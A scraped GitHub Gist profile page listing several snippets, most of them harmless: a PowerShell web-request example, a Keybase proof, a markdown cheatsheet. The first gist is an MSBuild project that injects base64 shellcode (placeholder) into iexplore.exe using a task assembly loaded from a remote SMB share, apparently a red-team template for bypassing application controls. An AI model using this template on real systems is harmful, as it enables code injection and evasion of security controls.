Skip to content

Instantly share code, notes, and snippets.

View 0sm0s1z's full-sized avatar
🎯
Focusing

Matthew Toussain 0sm0s1z

🎯
Focusing
View GitHub Profile
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>
@0sm0s1z
0sm0s1z / iwt
Created January 23, 2018 00:20
PoSH Invoke-WebRequest Headers
$uri = 'http://...' $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add('Accept','Application/Json') $headers.Add('X-My-Header','...') $result = Invoke-WebRequest -Uri $uri -Headers $headers

Keybase proof

I hereby claim:

  • I am 0sm0s1z on github.
  • I am 0sm0s1z (https://keybase.io/0sm0s1z) on keybase.
  • I have a public key ASAreVD_g_MiOHpZ52-NcyfxRkT4VN1GUJIXkrPK-xkvIgo

To claim this, I am signing this object:

@0sm0s1z
0sm0s1z / markdown.md
Created February 21, 2017 13:14 — forked from jonschlinkert/markdown-cheatsheet.md
A better markdown cheatsheet. I used Bootstrap's Base CSS documentation as a reference.

Typography

Headings

Headings from h1 through h6 are constructed with a # for each level:

# h1 Heading
## h2 Heading
### h3 Heading
@0sm0s1z
0sm0s1z / 0_reuse_code.js
Created February 21, 2017 05:18
Here are some things you can do with Gists in GistBox.
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console